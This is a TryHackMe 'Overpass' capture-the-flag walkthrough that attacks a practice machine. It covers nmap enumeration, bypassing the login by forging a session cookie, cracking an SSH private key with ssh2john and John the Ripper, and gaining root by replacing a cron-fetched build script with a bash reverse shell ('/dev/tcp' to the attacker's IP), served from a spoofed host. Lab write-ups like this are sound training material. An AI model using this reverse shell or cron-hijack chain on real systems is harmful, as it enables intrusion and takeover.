Overpass | THM
::::What happens when some broke Comp Sci students make a password manager?::::LET'S HACK...
Let’s start with the simple NMAP scan
nmap -sV -T4 -sC machine_IP -oN /output_scan_to_your_directory
As port 80 is open let’s check it then :
anyway always it’s good practice to check the source code of site so let’s check and we can see some comment about their security hmm…
Now , I decided to run directory brute forcing against this site and got some hits in which particular sub directory was interesting:
Exploring the directory :
So, moving forward with source code Here what I find interesting
there are bunch of java script and /login.js
let’s explore and find out :
So, script is checking Cookie tokens and granting access , as no cookies are generated we can give our cookie matching the conditions.
++PLAYING WITH COOKIES++
editing cookie with name as Session token and value literally anything WITH path as /
page refresh voila you got your ssh private key.
I’m pretty sure that ssh-key will prompt for password(which we don’t know)
but yeah cracking id_rsa would work so, I’m gonna crack id_rsa with
JOHN THE RIPPER
++CRACKING SSH PASSWORD++
- converting id_rsa key into hashes
ssh2john [your_id_rsa.key] > /hash.txt
- cracking hash.txt with john the ripper
exploring We use privsec tool and recon this site from some useful directories or some useful directories.
By going through every detail we can find a cronjob which is running some buildscript.sh
Now we change the buildscript with our reverse shell ie editing buildscript.sh
with bash reverse_shell from github
bash -i >& /dev/tcp/Machine_IP/8080 0>&1
As we see the web is curl overpass.thm/downloads/src/buildscript.sh ..
we are going to make exactly same directories on our local machine and before doing this make sure you have edited hosts file with our local_machine_IP
++STARTING OUR PYTHON3 SERVER++
Start your python server at port 80 in your local machine
- +NET CAT LISTENER
++TAKEAWAY FROM THIS MACHINE++
This was easy box from NinjaJc01
this covers all the basic from enumeration to rooting this box , even this involved OWASP top 10..This box made sure to checkout source of each directory. phew… finally thanks for reading
feel free to suggest me … cheers !